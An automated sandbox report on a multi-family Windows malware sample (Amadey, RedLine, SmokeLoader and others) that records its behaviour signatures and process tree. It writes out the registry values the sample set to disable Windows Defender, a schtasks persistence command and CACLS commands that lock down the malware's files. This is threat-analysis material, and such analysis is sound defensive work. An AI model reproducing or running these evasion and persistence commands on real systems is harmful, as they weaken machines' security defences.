Malware Analysis Report

2025-08-05 19:01

Sample ID 231019-memgmafd4s
Target file
SHA256 db2d5629df8d990ffb67b0573563b53fcaa3676c21cc164053f4abce40cfa8ae
Tags
amadey glupteba redline sectoprat smokeloader 5141679758_99 @ytlogsbot breha kukish pixelscloud2.0 up3 backdoor dropper evasion infostealer loader persistence rat trojan dcrat microsoft discovery phishing spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

db2d5629df8d990ffb67b0573563b53fcaa3676c21cc164053f4abce40cfa8ae

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

amadey glupteba redline sectoprat smokeloader 5141679758_99 @ytlogsbot breha kukish pixelscloud2.0 up3 backdoor dropper evasion infostealer loader persistence rat trojan dcrat microsoft discovery phishing spyware stealer

RedLine

Glupteba payload

Amadey

SectopRAT payload

Modifies Windows Defender Real-time Protection settings

DcRat

SmokeLoader

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

SectopRAT

RedLine payload

Blocklisted process makes network request

Modifies Windows Firewall

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Uses the VBS compiler for execution

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

.NET Reactor proctector

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Detected potential entity reuse from brand microsoft.

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-19 10:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-19 10:22

Reported

2023-10-19 10:25

Platform

win7-20230831-en

Max time kernel

39s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\3B6B.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2352 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 2236 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 2036 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1968 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1212 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1360 N/A N/A C:\Users\Admin\AppData\Local\Temp\3B6B.exe
PID 1276 wrote to memory of 1052 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C85.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe

C:\Users\Admin\AppData\Local\Temp\3B6B.exe

C:\Users\Admin\AppData\Local\Temp\3B6B.exe

C:\Users\Admin\AppData\Local\Temp\3C85.exe

C:\Users\Admin\AppData\Local\Temp\3C85.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\3D50.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe

C:\Users\Admin\AppData\Local\Temp\3E89.exe

C:\Users\Admin\AppData\Local\Temp\3E89.exe

C:\Users\Admin\AppData\Local\Temp\3FA3.exe

C:\Users\Admin\AppData\Local\Temp\3FA3.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe

C:\Users\Admin\AppData\Local\Temp\40CD.exe

C:\Users\Admin\AppData\Local\Temp\40CD.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe

C:\Users\Admin\AppData\Local\Temp\42A2.exe

C:\Users\Admin\AppData\Local\Temp\42A2.exe

C:\Users\Admin\AppData\Local\Temp\439C.exe

C:\Users\Admin\AppData\Local\Temp\439C.exe

C:\Users\Admin\AppData\Local\Temp\44D5.exe

C:\Users\Admin\AppData\Local\Temp\44D5.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=42A2.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Users\Admin\AppData\Local\Temp\4CC2.exe

C:\Users\Admin\AppData\Local\Temp\4CC2.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2MM263Ua.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2MM263Ua.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Temp\7FF3.exe

C:\Users\Admin\AppData\Local\Temp\7FF3.exe

C:\Users\Admin\AppData\Local\Temp\81B9.exe

C:\Users\Admin\AppData\Local\Temp\81B9.exe

C:\Users\Admin\AppData\Local\Temp\8591.exe

C:\Users\Admin\AppData\Local\Temp\8591.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=81B9.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\8DCC.exe

C:\Users\Admin\AppData\Local\Temp\8DCC.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

